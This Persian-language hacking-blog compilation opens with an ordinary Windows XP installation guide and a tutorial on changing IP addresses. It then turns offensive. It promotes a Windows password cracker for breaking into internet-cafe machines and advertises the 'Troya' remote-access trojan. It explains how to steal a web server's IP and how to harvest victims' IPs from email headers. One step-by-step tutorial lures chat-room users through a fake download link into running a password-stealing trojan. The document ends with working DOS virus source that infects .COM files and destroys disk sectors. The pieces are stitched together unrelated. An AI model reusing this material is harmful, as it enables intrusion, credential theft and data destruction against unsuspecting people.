ابتدا بايد يك cd ويندوزxp داشته باشيد . دقت كنيد كه اين cd بايد bootable باشد. اگر ميخواهيد كه ويندوز فعلي را تبديل به ويندوز xp كنيد يا update كنيد نيازي به cd بوت نداريد. cd ويندوز را درون cd rom گذاشته و ويندوز اتوماتيك auto run خواهد شد.دقت كنيد كه اگر بخواهيد ويندوز فعلي خود را كه مثلا 98 ياme يا2000 ميباشد را update كنيد اطلاعات شما مثلا my document شما و برنامه هاي نصب شده شما حفظ خواهد شد.ولي اگر ويندوز شما ايراد دارد.بهتر است ان را از اول فرمت و نصب كنيد .
بعد از اين كه cd ويندوز را گذاشتيد. خود به خود مرحله نصب ويندوز شروع خواهد شد . روي گزينه install windows xp كليك كنيد.
در قسمت بعد از شما پرسيده ميشود كه ميخواهيد يك ويندوز جديد نصب كنيد يا ويندوز فعلي را update كنيد در صورتي كه در ويندوز فعلي شما ايرادي ندارد و ميخواهيد ان را تبديل به xp كنيد اين مرحله را رد كنيد و دست نزنيد زيرا به طور خودكار upgrade recommandedانتخاب شده است.ولي چنانچه قصد داريد ويندوز جديدي در درايوي ديگر نصب كنيد بايد new instalation را انتخاب كنيد.در اين صورت بعد از نصب كامل ويندوز xp هنگامي كه سيستم را روشن ميكنيد دو منو ظاهر شده و از شما پرسيده خواهد شد كه ميخواهيد وارد كدام ويندوز شويد.بدين ترتيب شما 2 ويندوز خواهيد داشت.
در مرحله بعد بايد سريال ويندوز را وارد كنيد اين سريال احتمالا در پشت كيس cd يا درون خود cd داخل فايلي به نام serial يا cd key يا readme نوشته شده.
در قسمت بعد روي دكمه advanced option كليك كرده و در پنجره جديد گزينه دوم را تيك بزنيد.اين براي اين است كه شما درايوي را كه ويندوز در ان ريخته شود را انتخاب كنيد.همچنين جهت تسريع كار ميتوانيد گزينه اول را تيك بزنيد تا تمامي فايلهاي ويندوز روي هارد ريخته شده و از انجا نصب شوند.بر روي ok كليك كنيد. در قسمت پايين ميتوانيد زبان خود را انتخاب كنيد ان را farsiانتخاب كنيد تا ابزار فارسي نصب شوند. حال بر روي next كليك كنيد.
در اين مرحله از شما سوال ميشود ميخواهيد نصب ويندوز رو از اينترنت به روز كنيد؟ چنانچه مايل باشيد ميتوانيد گزينه بالا را انتخاب كرده و next را بزنيد در اين صورت اخرين update ها از اينترنت دانلود خواهد شدولي با انتخاب گزينه پاييني بدون update وارد مرحله بعد مي شويد.به هر حال بعد از رد كردن اين قسمت فايلهاي ضروري اتوماتيك كپي يا دانلود خواهند شد و سيستم restart خواهد شد.
منتظر بمانيد تا ويندوز مراحل نصب را طي كند بعد از اين كه به متني كه حاوي توضيحات مايكروسافت و نوعي قرارداد با شما ميباشد رسيديد.روي F8 كليك كنيد تا تائيد شود.
در قسمت بعد چنانچه شما قبلا ويندوزي داشته باشيد از شما خواهد شد كه ميخواهيد روي همان ويندوز نصب شود يا انتخاب با شما باشد. با زدن دكمه R ميتوانيد روي همان ويندوز نصب كنيد و با زدن دكمهEsc انتخاب درايو ظاهر خواهد شد.پيشنهاد ما Escميباشد.
اگر Escرا زده باشيد اين قسمت يعني قسمت انتخاب درايو ظاهرمي شود. ميتوانيد درايو مورد نظر را انتخاب كنيد همچنين با زدن دكمه Dميتوانيد درايو را پاك كنيد تا بعدا تبديل به درايو جديد يا تبديل به دو يا چند درايو كنيد. بعد از اين كه D را بزنيد دوباره دكمه Lرابزنيد حال درايو پاك شده.ميتوانيد درايو پاك شده را انتخاب و با زدن دكمهCان را دوباره بسازيد.وقتي ان را ميسازيد ميتوانيد هجم ان را تايين كنيد .مثلا اگر ميخواهيد درايو را تبديل به دو درايو كنيد.بايد هجم فعلي را تبديل به 2 كرده و Enter كنيد.حال دو درايو جديد خواهيد داشت.البته براي عوض كردن يا تقسيم هجم درايو ميتوانيد از Partition Magic هم استفاده كنيد كه اموزش ان در بخش اموزش گذاشته شده.يا اين كه براي ساخت پارتيشن هاي خود بايد Fdisk را بلد باشيد كه ان هم در قسمت اموزش ياد داده شده است. به حر حال با انتخاب درايو مورد نظر خود ميتوانيد وارد قسمت بعد شويد.
در اينجا ميتوانيد انتخاب كنيد كه فرمت درايو شما چه باشد FAT يا NTFSتفاوت اين دو را در قسمتهای بعدی می توانید ببينيد و انتخاب كنيد.بهتر است گزينه هايي كه جلوي ان كلمه Quick نوشته شده را انتخاب نكنيد زيرا فرمت كامل مناسب تر است. بعد از اين كه مراحل را رد كرديد ويندوز فرمت انتخابي شما را اغاز كرده و سپس فايلهاي مورد نياز را كپي ميكند. سپس سيستم restart خواهد شد.
بعد از شروع مجدد سيستم منتظر بمانيد تا مرحل نصب اتوماتيك پيش برود تا اينكه شما با پنجره اي مواجه خواهيد شد.در اينجا زبان خود را انتخاب ميكنيد .چنانچه در قسمت چهارم شما فارسي را انتخاب كرده ايد اين قسمت را دست نزنيد . فقط در قسمت details عربي را remove كنيد(البته اين كار بستگي به نوع كيبورد شما دارد ولي در اكثر كيبوردها با اين كار چند ايراد جزئي بر طرف خواهد شد به هر حال فارسي سازي ويندوز xp كامل نيست و ايراداتي در حروف ي پ ژ گ احتمالا خواهيد داشت براي فارسي كردن ويندوز ميتوانيد از يك فارسي ساز استفاده كنيد) رو دكمه ok زده و nextكنيد.
از اينجا به بعد براي هر دو حالت نصب از روي ويندوز و نصب از boot مشترك ميباشد.
در اين جا نام خود و نام كمپاني يا شركت يا هرچه دوست داريد.مثلا home
در اينجا نام كامپيوتر خود را مينويسيد كه نامي به عنوان پيش فرض نوشته ميشود.در قسمت پايين ميتوانيد پسور مديريت كامپيوتر را وارد كنيد به اين ترتيب كسي نميتواند به جاي شما وارد شود زيرا شما مديريت كامپيوتر را داريد و ميتوانيد حتي براي استفاده كننده هاي ديگر هم قواعدي خواص تايين كنيد مثلا برادر كوچك شما نتواند فايلها را پاك كند.
اين قسمت براي تنظيمات اتصال به اينترنت است.روي منوي پايين روي اول زده و ايران را انتخاب كنيد.در قسمت What Area Code استان را ميزنيد مثلا براي تهران 021 در قسمت dial nomber چيزي ننويسيد.و در پايين هم نوع ارتباط تلفني خود تون يا پالس را انتخاب كنيد و next كنيد.
در اينجا ساعت محلي را انتخاب ميكنيد.جلوي time zone اگر در ايران هستيد GMT+03:30 Tehran را انتخاب كنيد.و بر روي next كليك ميكنيد .ويندوز نصب را ادامه داده و سر انجام به پايان ميرساند و سيستم restart خواهد شد.
بعد از شروع مجدد ويندوز از شما سوالاتي خواهد شد شما تمام گزينه هايي كه از شما ميخواهد ويندوز را توسط اينترنت رجيستر كنيد را كنسل كنيد(بايد گزينه هاي پايين را انتخاب كنيد) زيرا هنوز معلوم نيست مودم شما به درستي كار ميكند يا نه ؟
سپس در اخر از شما خواسته ميشود 5 user معرفي كنيد كه شما براي اولي نام خود را وارد كرده و finish را بزنيد.حال شما وارد ويندوز جديد شده ايد
برنامه ای برای بدست آوردن پسورد يوزر ويندوز که با او ميتونين براحتی کافينتها رو هک کنيد فقط کافيه وارد يوزر اصلی کامپيوتر بشين بعد هر کار دلتون خواست انجام بديد مثلا يه ويروس اجرا کنيد
برنامه ي ترويا (Troya) نسخه ي 1.0 هم اكنون آماده ي دانلود مي باشد.
معرفي برنامه
ترويا (Troya) برنامه اي براي كنترل كامپيوتر از راه دور، از طريق وب است.
اين برنامه تروجاني بدون كلاينت(Client) است. يعني برخلاف تروجانهاي ديگر كه براي وصل شدن به كامپيوتر هدف نياز به يك برنامه ي جداگانه به نام كلاينت داشتند، اين برنامه نيازي به Clientندارد.
روش عملكرد اين برنامه بدين صورت است كه شما از Internet Explorer براي وصل شدن به كامپيوتر هدف استفاده مي كنيد. يعني در ترويا (Troya)كامپيوتر هدف شما به صورت يك سايت اينترنتي در مي آيد كه با وارد كردن IP آن در مرورگر وب، مي توانيد به آن كامپيوتر از راه دور دسترسي داشته باشيد.
بدين صورت شما فقط كافي است سرور را در كامپيوتر هدف اجرا كنيد و بعد از آن در هر شرايطي مي توانيد به كامپيوتر هدف وصل شويد. زيرا احتياجي به Client نيست.
مزيت ها
مهمترين مزيت اين برنامه همانطور كه اشاره شد، راحت الاستفاده بودن آن است. بدليل نياز نداشتن به Client.
ديگر مزيت اين برنامه، توانايي سرويس دهي به چند كاربر همزمان است. به عنوان مثال در تروجانهاي ديگر مانند ترانژوا (Tranzhva)، دو كاربر همزمان نمي توانستند فايلي دانلود كنند. اما در ترويا (Troya)بيش از يك كاربر به طور همزمان مي توانند به فايلهاي كامپيوتر هدف دسترسي داشته باشند. درست همانند يك سايت كه مي تواند بيش از يك بيننده در آن واحد داشته باشد.
Live Server Update. مزيت ديگر اين برنامه تونايي بروز رساني خودكار است. يعني اگر اشكالي در ترويا پيدا شود، بعد از رفع شدن اين اشكال، سرور به طور خودكار در كامپيوترهاي هدف بروز رساني مي شود.
Live HTML Update: طراحي صفحات ترويا قابل به روزرساني است.
قابليت ها
بعد از وصل شدن به كامپيوتر هدف، مي توانيد كارهاي زير را انجام دهيد:
1-ديدن فايلهاي كامپيوتر هدف و دانلود آنها (File Manager)
2-عكس گرفتن از صفحه كامپيوتر هدف (Screen Capture)
3-ديدن پنجره هايي كه در حال حاضر در محيط ويندوز وجود دارند.(Window Manager)
4-ديدن برنامه ها و پروسه هاي در حال اجرا در ويندوز و بستن آنها. (Process Manager)
نسخه ي آزمايشي اين برنامه هم اكنون آماده ي دانلود مي باشد. نسخه ي كامل ترويا در دست ساخت است كه قابليتهاي بسيار بيشتري نسبت به اين ورژن دارد. كه به زودي كامل شده و براي فروش آماده خواهد شد.
حتماً تا حالا شده که وقتی می خواهید یه برنامه را از سیستمتون حذف کنید این برنامه Add/Remove Programs چقدر دیر میاد بالا و جون می کنه تا این لیست برنامه ها را براتون بیاره (دیگه اگه آپدیت هاش هم تیکش را زده باشید) خوب بگذریم، یه برنامه کم حجم که حدوداً 150 کیلوبایت حجمش هست و مجانی و پر کاربرد، توپه...
این برنامه به راحتی به شما اجازه میده تا هر نرم افزاری را که خواستید از کامپیوترتون پاک کنید یا نرم افزارهای مختلف را نصب کنید.
در این قسمت سعی میکنم بتون یاد بدم چه جوری IP خودتون را با یه IP دیگه از همون Range عوض کنین. هر موقع که به اینترنت وصل میشین، پروتکل DHCP به شما یه IP تخصیص میده. عوض کردن این IP کار چندان سختی نیست و البته میتونه مفید هم باشه! موقعی که شما تحت حمله DDoS هستین یا وقتی که میخواین تمامی درخواستها به یه وب سرور رو به طرف خودتون Redirect کنین یا فرضاً وقتی که IP شما بسته شده و میخواین به جای اون از یه IP دیگه در Range خودتون استفاده کنین و یا ... به تغییر دادن IP احتیاج پیدا میکنین.
ب) اطلاعات مورد نیاز قبل از اینکه شما بتونین IP خودتون رو عوض کنین، باید یه سری اطلاعات جمع کنین. این اطلاعات عبارتند از : محدوده IP شما، Subnet Mask، مدخل (Gateway) پیش گزیده، سرور DHCP و سرورهای DNS
1. به دست اوردن محدوده IP : بدست اوردن IP Range اصلاً سخت نیست! فرض کنید IP شما 24.193.110.255 باشه. شما میتونین به طور مشخص از محدوده زیر برای IP جدید خودتون انتخاب کنین :
24.193.110.1 < [آی پی جدید] < 24.193.110.255
امیدوارم بلد باشین IP خودتونو بدست بیارین!!
2. به دست اوردن Subnet Mask، مدخل، سرور DHCP و DNS : به دست اوردن اینها هم سادهس! یه خط فرمان DOS باز کنین و توش تایپ کنین ipconfig /all شما حالا باید بتونین یه چیزی شبیه به این ببینین :
Host Name . . . . . . . . . . . . : My Computer Name Here Primary Dns Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Unknown IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No
خوب! این تموم اطلاعاتی بود که نیاز داشتین. بهتره اون خط فرمان DOS رو باز نگه دارین یا اینکه اطلاعاتش رو کپی کنین. (برای کپی کردن، متن رو انتخاب کنین و یکبار روش کلیک کنین)
3. عوض کردن IP : برای عوض کردن IP خودتون، اول باید یه IP انتخاب کنین (یادتون نره که تو محدوده باشه!) به نظر من بهتره اول مطمئن بشین که این IP جدید مُرده! (همون Dead) بلدین که چطوری؟ این IP رو پینگ کنین و اگه Time Out داد مطمئن باشین که میشه ازش استفاده کرد. حالا در Control Panel برید به Network Connections و روی Connection فعال دابل کلیک کنین. دکمه Properties رو بزنین و برید به برگه Networking. حالا (Internet Protocol (TCP/IP رو انتخاب کنین و دکمه Properties رو بزنین. در پنجره جدیدی که باز شده، قسمتهای Use the following IP address و Use the following DNS server addresses رو با توجه به اطلاعاتی که در قسمت 2 به دست اوردین پر کنین. در قسمت اول، IP ای رو که انتخاب کردید (IP جدید) و در قسمت دوم، آدرس DNS Server رو وارد کنین. حالا تغییرات رو ثبت و تأیید کنین. فقط یه تست کوچیک مونده! در مرورگر خودتون، آدرس یه سایت رو وارد کنین. اگه صفحه سایت اومد، بدونین که با IP جدید دارین کار میکنین. برای اینکه مطمئن بشین که تغییرات اعمال شدن، دوباره در خط فرمان DOS تایپ کنین ip config /all اگه پس از اجرای این دستور، IP و DNS جدید رو دیدید، بدونین که درست عمل کردید.
ج) حملات DDoS و DoS
اگه فایروال شما نشون بده که شما تحت یه حمله DDoS هستین، این معمولاً موقعیه که شما دارید از طرف یک یا چند تا IP از طریق UDP مورد حمله قرار میگیرین. در این حالت شما میتونین با استفاده از روش "عوض کردن IP" که در بالا توضیح داده شد، از خودتون محافظت کنین.
د) وب سرورها و سرویس های دیگه
اگه شما میدونین که در محدوده IP شما یه وب سرور قرار داره، میتونین IP اون رو بدزدین و خودتون یه وب سرور بشین! به این ترتیب هر درخواست DNS ای که برای اون IP ارسال بشه، به شما Redirect میشه و به جای اون سایت، صفحه شما نشون داده میشه!
البته دزدیدن IP معمولاً کار درستی نیست! چون ممکنه به بستن حساب شما منجر بشه!
سلام دوستان من تا به اینجا با مفاهیم هک وآی پی وپورت آشنا شدید.یکی از بهترین راهها برای دسترسی سریع شما به آی پی طرف مقابل این است که به نحوی از او خواهش کنید که برای شما ایمیلی ارسال کند.
غافل از این که با این کار آی پی خود را دو دستی و با کمال احترام تقدیم شما کرده وبعد بستگی به هوش وزکاوت شما دارد.حال ۱ سوال پیش می آید که چگونه از روی ایمیل در یافتی آی پی شخص را ببینیم؟
شما می توانیذ با استفاده از راهنمایی های زیر به هدف خود که دیدن آی پی شخص است برسید.
نظر یادتون نره
براي پيدا کردن آدرس IP افرادي که به شما ايميل ارسال نموده اند مراحل زير را دنبال نماييد :
1. هنگاميکه وارد Mail Box خودتان شديد گزينه Mail Options را انتخاب کنيد .
2. سپس گزينه General Preferences را انتخاب نماييد. در اين قسمت مي توانيد تغیراتي را در مشخصات خود و امکانات ايميلتان ايجاد کنيد.بطور مثال در قسمت from name, نامي که بالاي ايميلهاي ارسالي شما نشان داده مي شود را مي توانيد تغیير دهید و غيره
3. گزينه Headers : براي نمايش آدرس IP ايميل کنندگان در قسمت Headersگزينه show all را انتخاب نماييد.
4. با انجام مراحل بالا با باز کردن ايميلهاي دريافتي کليه مشخصات فرد از جمله آدرس IP آن در بالاي ايميل نمايش داده مي شود.
سلام امروز میخوام براتون یه اموزش توپ بزارم که جواب سوالات عده ی زیادی از دوستانم هم هست.خیلی ها پرسیده بودن که وقتی فایل سرور ساختیم چطوری میشه اونو واسه طرف فرستاد این سوال خیلی اماتوری خوب معلومه اونو تو چت روما یا به میل طرف send میکنیم ولی امروز با این اموزش شما میتونید فایل الوده رو خیلی راحتر به سیستم طرف بفرستین و طرف و هک کنید خوب حالا این فایل الوده هر چیزی میتونه باشه میتونه تروجان باشه که من چندتا از اونارو که پسورد ایدی رو براتون میفرستند رو تو اموزشای قبلیم گذاشتم یا میتونه ویروس یا هر چیز دیگه ای باشه.
خوب امروز من(رضا اعظمی) میخوایم یه فایل الوده که توسط برنامه iRcHaTaN -Ps 7.1 که یکی از بهتری پسورد سندر هاست ایدی طرف رو هک کنیم برای این کار میتونیم از برنامه EvilHTTPServer استفاده کنیم که خیلی راحت میتونیم طرف رو گول بزنیم و با دادن ادرس یه سایت انترنتی و دانلود برنامه از این سایت اونو هک کنیم
بعد از دانلود کردن برنامه اونو از حالت زیپ خارج کنید اول انتی ویروستون رو غیر فعال کنید چون این برنامه به زبان بیسیک نوشته شده و با ویروس اشتباهی گرفته میشه خوب حالا میریم سراق اموزشش:
در قسمتServer :که اولین بخش از این برنامست و شکل اونم در بالا میبینید باید مسیر فایل سروری رو که میخواین واسه طرف بفرستید رو مشخص کنید.مثلا فایلتون رو با برنامه برنامه ياهو اسپای میسازید که بازم میگم من برنامه iRcHaTaN -Ps 7.1 رو نسبت به بقیه برنامه ها ارجه تر میدونم.شما باید مسیر فایلی رو که ساختین رو به برنامه بدین.
در قسمت Exploit:شما در این قسمت باید به دایرکتوری خود برنامه رفته و از چندین فایلی که به انتخاب گذاشته quicktime.exp رو انتخاب کنید.
ودر اخر در صفحه اصلی برنامه باید ایپی خودتون رو به صورت یک لینک در بیارید و بنویسیدبرای بدست اوردن ای پی در قسمت RUN عبارت CMD را تایپ کرده و کلید اینتر را بزنیدصغحه داس ویندوز باز میشود حال تایپ کنید IPCONFIG با تایپ کردن این عبارت اطلا عات زیر به شما داده میشه:
که اونی رو که با قرمز مشخص کردم ای پی خودتونه.حالا سر اموزش اصلی مون بر میگردیم شما بایددر صفحه پایانی برنامه بنویسید .
http://85.185.23.57 که این عدد همون شماره ای پی خودتونه که بدست اوردید.یکی از مزیت های این برنامه اینه که شما میتونید هرچی که دلتون خواست به اخر این لینک اضافه کنید مثلا http://85.185.23.57/index.html که من یه عکس تهیه کردم که کاملا متوجه شید.
شما خیلی راحت میتونید تو چت روم این ادرسو به طرف بدید که مثلا تو این سایت یه فیلتر شکن قوی واسه دانلود هست بسته به زرنکی خودتون داره وقتی طرف روی این لینک کلیک کنه اولا همون لحظه ای پی طرف مقابل رو صفحه برنامه میفته که با این ایپی کلی کار میشه کرد بعدشم یه صفحه مثل دانلود واسه طرف باز میشه که اگه برنامه رو دانلود کنه و بازش کنه که حتما همینطوره به همین راحتی هک میشه.با تشکر رضا اعظمی.
; had multiple programming errors in it that kept it from replicating. ; My version is much more successful. ;
page 255,80 code segment word public 'code' assume cs:code,ds:code org 100h main proc;edure
;EQUates... idc equ 69h ;ID character - (note: 69) cr equ 13 ;ASCII for carriage return lf equ 10 ;ASCII for line feed
;End codes. These determine what happens after the string is displayed.
terminate equ 0 ;Terminate program after display halt equ 1 ;Cause the system to hang after display SimulateCritErr equ 2 ;Simulate the critical error handler return2host equ 3 ;Resume program immediately FlashFloppy equ 4 ;Wait for a key, then reset Drive A: WaitKey equ 5 ;Wait for a key, then resume program PauseKey equ 6 ;Same thing, but uses a pause message StackError equ 7 ;Cause a stack overflow (halts system)
tof: ;Top-Of-File jmp begin ;Skip over program idchar: db idc ;ID character
HostProgram: nop ;First run copy only! nop ;First run copy only!
first_four: nop ;First run copy only! address: int 20h ;First run copy only! check: nop ;First run copy only!
begin: call nextline ;Push IP+3 onto stack nextline: pop bp ;mov bp,ip sub bp,offset nextline ;bp=disp. for mem locs
push ax ;Save AX call cryptor ;Decrypt jmp short retloc ;Continue program
cryptor: mov al,[bp+offset encrypt_val] ;encrypt val lea si,[bp+offset toec] ;Top Of Encrypted Code mov cx,offset eoec-offset toec ;Length of " " cryptorloop: xor [si],al ;en/de crypt rol al,cl ;change code # inc si ;Next char please! loop cryptorloop ;loop if necessary ret ;Return to caller
infect: call cryptor ;Encrypt code pop cx ;Restore CX for INT 21 int 21h ;Call DOS call cryptor ;Decrypt code ret ;Go back
toec:;???????????????????????????????????????????????????Top Of Encrypted Code InfectIt: push cx ;Save CX for sub jmp infect
retloc: pop ax ;Restore AX xor di,di ;DI = 0
cli ;Disable interrupts mov ss,di ;Set up stack at: mov sp,2F0h ; 0000:02F0 sti ;Enable interrupts
mov si,96h ;Vector for INT 24h mov bx,ss:[si] ;BX = offset in segment mov cx,ss:[si+2] ;CX = segment lea dx,[bp+offset int24handler] ;CS:DX -} local handler mov ss:[si],DX ;Save offset mov ss:[si+2],cs ;Save segment mov si,es:[di+2F8h] ;Check operation mode cmp si,4643h ;'CF' if already TSRed jne GoOn ;Nope, jmp jmp return ;Yes, don't do anything
GoOn: mov cs:[di+4Ch],bx ;use unused part of PSP mov cs:[di+4Eh],cx ; to save BX and CX push cs ;Copy CS ... pop es ; ... to DS
mov byte ptr [bp+offset infected],0 ;Reset infection count mov byte ptr [bp+offset max2kill],3 ;Stop after 3 or less
GoOn2: lea si,[bp+offset first_four] ;Original first 4 bytes mov di,offset tof ;TOF never changes cld ;Read left-to-right movsw ;Copy the 4 bytes movsw ;Copy the 4 bytes
mov ah,1Ah ;Set DTA address ... lea dx,[bp+offset DTA] ; ... to *our* DTA int 21h ;Call DOS to set DTA
mov ah,4Eh ;Find First ASCIIZ lea dx,[bp+offset filespec] ;DS:DX -} '*.COM',0 lea si,[bp+offset filename] ;Point to file push dx ;Save DX jmp short continue ;Continue...
return: mov ah,1ah ;Set DTA address ... mov dx,80h ; ... to default DTA int 21h ;Call DOS to set DTA xor di,di ;DI= 0 mov es,di ;ES= 0 mov si,96h ;Vector for INT 24h mov bx, cs:[di+4Ch] ;Restore from saved BX mov word ptr es:[si+0], bx ;Place back into vector mov cx, cs:[di+4Eh] ;Restore from saved CX mov word ptr es:[si+2], cx ;Place back into vector push cs ;Move CS ... pop es ; ... to ES
mov ax,[bp+offset SavedAX] ;Restore AX xor bx,bx ;BX= 0 mov cx,bx ;CX= 0 mov dx,cx ;DX= 0 mov si,dx ;SI= 0 mov di,si ;DI= 0 mov sp,0FFFEh ;SP= FFFEh (normal) mov bp,100h ;BP= 100h (RETurn addr) push bp ; Put on stack mov bp,ax ;BP= 0 ret ;JMP to 100h
nextfile: or bx,bx ;Did we open the file? jz skipclose ;No, so don't close it mov ah,3Eh ;Close file int 21h ;Call DOS to close it xor bx,bx ;Set BX back to 0 skipclose: mov ah,4Fh ;Find Next ASCIIZ
continue: pop dx ;Restore DX push dx ;Re-save DX xor cx,cx ;CX= 0 xor bx,bx int 21h ;Find First/Next jnc skipjmp jmp NoneLeft ;Out of files
skipjmp: mov ax,3D02h ;open file mov dx,si ;point to filespec int 21h ;Call DOS to open file jc nextfile ;Next file if error
mov bx,ax ;get the handle mov ah,3Fh ;Read from file mov cx,4 ;Read 4 bytes lea dx,[bp+offset first_four] ;Read in the first 4 int 21h ;Call DOS to read
cmp byte ptr [bp+offset check],idc ;Already infected? je nextfile ;Yep, try again ... ;NOTE: Delete the two lines above if you want it to re-infected programs.
cmp byte ptr [bp+offset first_four],77 ;Mis-named .EXE? je nextfile ;Yep, maybe next time!
mov ax,4202h ;LSeek to EOF xor cx,cx ;CX= 0 xor dx,dx ;DX= 0 int 21h ;Call DOS to LSeek
cmp ah,0F8h ;Longer than 62K? ja nextfile ;Yep, try again... mov [bp+offset addr],ax ;Save call location
mov ah,40h ;Write to file mov cx,4 ;Write 4 bytes lea dx,[bp+offset first_four] ;Point to buffer int 21h ;Save the first 4 bytes
mov ah,[bp+offset encrypt_val] ;Get code number inc ah ;add 1 adc ah,0 ;increment if it's zero mov [bp+offset encrypt_val],ah ;Save new code number
mov ah,40h ;Write to file mov cx,offset eof-offset begin ;Length of target code lea dx,[bp+offset begin] ;Point to virus start call InfectIt ;Exempt from encryption ComeBackHere: mov ax,4200h ;LSeek to TOF xor cx,cx ;CX= 0 xor dx,dx ;DX= 0 int 21h ;Call DOS to LSeek
mov di,100h ;DI= 100h cmp word ptr [di],20CDh ;an INT 20h? je TheEnd ;Don't go to prev. dir.
lea dx,[bp+offset prevdir] ;'..' mov ah,3Bh ;Set current directory int 21h ;CHDIR .. jc TheEnd ;We're through! mov ah,4Eh jmp continue ;Start over in new dir
TheEnd: xor di,di ;DI= 0 mov es,di ;ES= 0 mov ah,2ah ;Get date int 21h ;Do it cmp dl,4 ;4th of the month? jne test2 ;Nope, second test cmp dh,7 ;July? jne test2 ;Nope, second test xor ax,ax ;Sector 0 jmp Kill ;Kill the disk now...
test2: mov ah,2ch ;Get time int 21h ;Do it or cl,cl ;On the hour? (x:00 xM) jnz GiveUp ;Return to program cmp ch,6 ;Midnight to 5 AM ??? jnl GiveUp ;Return to program add cl,ch ;Add first number mov ax,cx ;Transfer to AX cbw ;Zero out AH add al,dh ;Add DL to AL adc al,dl ;Add DL and carry flag adc ah,0 ;Add carry to AH or ax,ax ;AX = 0 ??? jnz Kill ;Kill the disk now... inc ax ;Well, adjust first...
Kill: mov dx,ax ;Sector number mov cx,1 ;One at a time.... xor bx,bx ;Point at PSP mov ah,19h ;Get current disk int 21h ;Call DOS to ^ int 26h ;Now kill the disk
GiveUp: mov bx,offset message_table ;point to table
mov ah,2ch ;Get time int 21h ;Call DOS to ^ inc dh ;(0-59)
timeloop: cmp dh,msgs ;mapped yet? jl timedone ;Yes, jump sub dh,msgs ;try to map it jmp short timeloop ;and check out work
timedone: mov al,dh ;AL gets msg # mov cl,al ;Save in CL for CritErr cbw ;AH gets 0 shl ax,1 ;AX = AX * 2 add bx,ax ;BX = index mov si,[bx] ;SI points to string mov ch,[si-1] ;CH is technique # mov dx,si ;DX points to string
mov ah,9 ;Display string int 21h ;Call DOS to ^
cmp ch,terminate ;Terminate program? je TerminateProg ;Nope, next test
cmp ch,halt ;Halt program? je $ ;Hang system if ch=halt
cmp ch,SimulateCritErr ;Simulate CritErr? je simulate ;yes, go do it
cmp ch,Return2host ;Return to host? je ResumeProgram ;yes, go do it
cmp ch,FlashFloppy ;Flash drive A:? je FlashFlop ;Yes, go do it
cmp ch,WaitKey ;Wait for keypress? je zwait ;Yes, go do it
cmp ch,PauseKey ;Pause message w/ wait? je zpause ;Yes, go do it
cmp ch,StackError ;Stack overflow? je StackErr ;Yes, go do it
;Invalid code, assume Return2host
ResumeProgram: jmp return ;Return to caller StackErr: call $ ;Cause stack overflow TerminateProg: int 20h ;Yep, all done!
simulate: lea dx,[bp+offset ARIFmsg] ;Abort, Retry ... mov ah,9 ;Print string int 21h ;Call DOS to ^
mov ah,1 ;Input a char int 21h ;Call DOS to ^
lea dx,[bp+offset crlf] ;crlf mov ah,9 ;Print string int 21h ;Call DOS to ^
cmp al,'a' ;Uppercase? jb uppercase ;Nope, jump sub al,' ' ;Yes, make uppercase
uppercase: cmp al,'A' ;Abort? je terminateprog ;Yep, go do it.
cmp al,'R' ;Retry? jne zskip ;skip over "retry" code
lea dx,[bp+offset crlf] ;Point to crlf mov ah,9 ;Print string int 21h ;Call DOS to ^ mov dh,cl ;Restore DH from CL jmp timedone ;Reprint error
zskip: cmp al,'I' ;Ignore? je ResumeProgram ;Return to host program cmp al,'F' ;Fail? jne simulate ;Invalid response
lea dx,[bp+offset fail24] ;Point to fail string mov ah,9 ;Print string int 21h ;Call DOS to ^ int 20h ;Terminate program
FlashFlop: mov ah,1 ;Wait for keypress int 21h ;Call DOS to ^
xor ax,ax ;Drive A: mov cx,1 ;Read 1 sector mov dx,ax ;Start at boot sector lea bx,[bp+offset boot_sector] ;BX points to buffer int 25h ;Flash light on A: jmp short ResumeProgram ;Resume if no error
zpause: lea dx,[bp+offset pause] ;Point to pause message mov ah,9 ;Print string int 21h ;Call DOS to ^ zwait: mov ah,1 ;Wait for keypress int 21h ;Call DOS to ^ jmp short ResumeProgram ;Go on...
ARIFmsg db cr,lf,'Abort, Retry, Ignore, Fail?$' fail24 db cr,lf,cr,lf,'Fail on INT 24' crlf db cr,lf,'$'
; I tried to make it as simple as possible to change the messages ; and add/delete them. Each message is in the format: ; ; db [technique] ;[label] db [Text] ; ; Where [technique] is one of the 8 codes shown at the beginning of ; this file (terminate, halt, etc.). This determines what the virus ; should do after printing the message. ; [label] is in the form "msg##" where ## is a number from 1 to ; "msgs". "msgs" is defined immediately before this ; comment block. ; [text] is a combination of text and ASCII codes, terminated by ; either a '$' or a ,36. ; ; If you change the number of messages the virus has, you should also ; add/remove lines from the offset table and change the "msgs" ; data byte appropriately. Let's say for instance that you want ; to remove "Program too big to fit in memory.": ; 1) Delete the line(s) with the message and the line ; immediately before it. ; 2) Move message #20 up to message #2's position and ; change its label from "msg20" to "msg2". ; 3) Delete the line "dw offset msg20" from the offset ; table. ; 4) Change the line before this comment block to: ; "msgs db 19" ; ; Later! ; -The BOOT SECTOR Infector ... ;
db FlashFloppy ;Waits for key, then flashes drive A: msg5 db 'I',39,'m hungry! Insert PIZZA & BEER into drive A: and',cr,lf pause db 'Strike any key when ready... $'
db SimulateCritErr ;Prints ARIF message and responds appropriately msg1 db 'Impotence error reading user',39,'s dick$'
db terminate ;Ends the program immediately msg2 db 'Program too big to fit in memory',cr,lf,'$'
db halt ;Halts the system msg3 db 'Cannot load COMMAND, system halted',cr,lf,'$'
db terminate ;Ends the program immediately msg4 db 'I',39,'m sorry, Dave.... but I',39,'m afraid' db ' I can',39,'t do that!',cr,lf,'$'
db WaitKey ;Waits for a keypress, then runs the program msg6 db 'Format another? (Y/N)? $'
db StackError ;Generates a stack overflow (halts the system) msg7 db 'Damn it! I told you not to touch that!$'
db terminate ;Ends the program immediately msg8 db 'Suck me!',cr,lf,'$'
db SimulateCritErr ;Prints ARIF message and responds appropriately msg9 db 'Cocksucker At Keyboard error reading device CON:$'
db terminate ;Ends the program immediately msg10 db 7,cr,cr,cr,7,cr,cr,cr,7,cr,cr,cr,lf db 'I',39,'m sorry, but your call cannot be completed as dialed.' db cr,lf,'Please hang up & try your call again.',cr,lf,'$'
db terminate ;Ends the program immediately msg11 db 'No!',cr,lf,cr,lf,'$'
db halt ;Halts the system msg12 db 'Panic kernal mode interrupt$'
db WaitKey ;Waits for a keypress, then runs the program msg13 db 'CONNECT 1200«',cr,lf,cr,lf,'$'
db return2host ;Runs host program immediately msg14 db 'Okay, okay! Be patient! ...',cr,lf,'$'
